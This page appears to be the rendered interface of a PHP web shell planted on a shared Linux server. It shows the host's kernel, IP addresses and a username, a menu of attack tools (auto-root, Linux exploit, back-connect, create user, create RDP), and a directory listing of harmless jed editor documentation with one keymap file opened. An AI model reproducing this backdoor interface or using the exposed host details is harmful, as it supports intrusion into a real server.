Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
jed-common /
txt /
[ HOME SHELL ]
Name
Size
Permission
Action
abbrev.txt
7.28
KB
-rw-r--r--
color.txt
1.64
KB
-rw-r--r--
compile.txt
2.2
KB
-rw-r--r--
dfa.txt
8.8
KB
-rw-r--r--
edt.txt
2.45
KB
-rw-r--r--
emacs.txt
8.53
KB
-rw-r--r--
filelock.txt
1.08
KB
-rw-r--r--
fold.txt
5.89
KB
-rw-r--r--
hooks.txt
19.85
KB
-rw-r--r--
ide-mode.txt
7.65
KB
-rw-r--r--
jed_faq.txt
18.17
KB
-rw-r--r--
linux-keys.txt
1.05
KB
-rw-r--r--
menus.txt
1.84
KB
-rw-r--r--
mouse.txt
6.64
KB
-rw-r--r--
pc-keys.txt
3.78
KB
-rw-r--r--
program.txt
5.13
KB
-rw-r--r--
rgrep.txt
1.25
KB
-rw-r--r--
rmail.txt
3.75
KB
-rw-r--r--
script.txt
4.05
KB
-rw-r--r--
syntax.txt
2.47
KB
-rw-r--r--
undo.txt
264
B
-rw-r--r--
utf8.txt
3.56
KB
-rw-r--r--
wjed.txt
7.65
KB
-rw-r--r--
wordstar.txt
1.76
KB
-rw-r--r--
xjed.txt
6.21
KB
-rw-r--r--
xrenderfont.txt
868
B
-rw-r--r--
yankpop.txt
4.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : linux-keys.txt
Matti-Oskari Leppänen <mongrel@mindless.com> suggested the following: I think that you should mention somewhere in documents how to make shift-arrow etc. work under linux-console ... because it's quite simple just make file that has following lines save it as some.map and loadkeys some.map then you have same keysyms as used in wmark.sl ________________________________________________ # S+Up shift keycode 103 = F100 string F100 = "\033[a" #S+Left shift keycode 106 = F101 string F101 = "\033[c" #S+Right shift keycode 105 = F102 string F102 = "\033[d" # S+Down shift keycode 108 = F103 string F103 = "\033[b" #C+Ins control keycode 110 = F104 string F104="\033[2^" #S+Ins shift keycode 110 = F105 string F105="\033[2$" #S+PgUp shift keycode 104 = F106 string F106 = "\033[5$" #S+PgDn shift keycode 109 = F107 string F107 = "\033[6$" #S+Home shift keycode 102 = F108 string F108 = "\033[1$" #S+End shift keycode 107 = F109 string F109 = "\033[4$" #S+Del shift keycode 111 = F110 string F110 = "\033[3$" #C+Del control keycode 111 = F111 string F111 = "\033[3^"
Close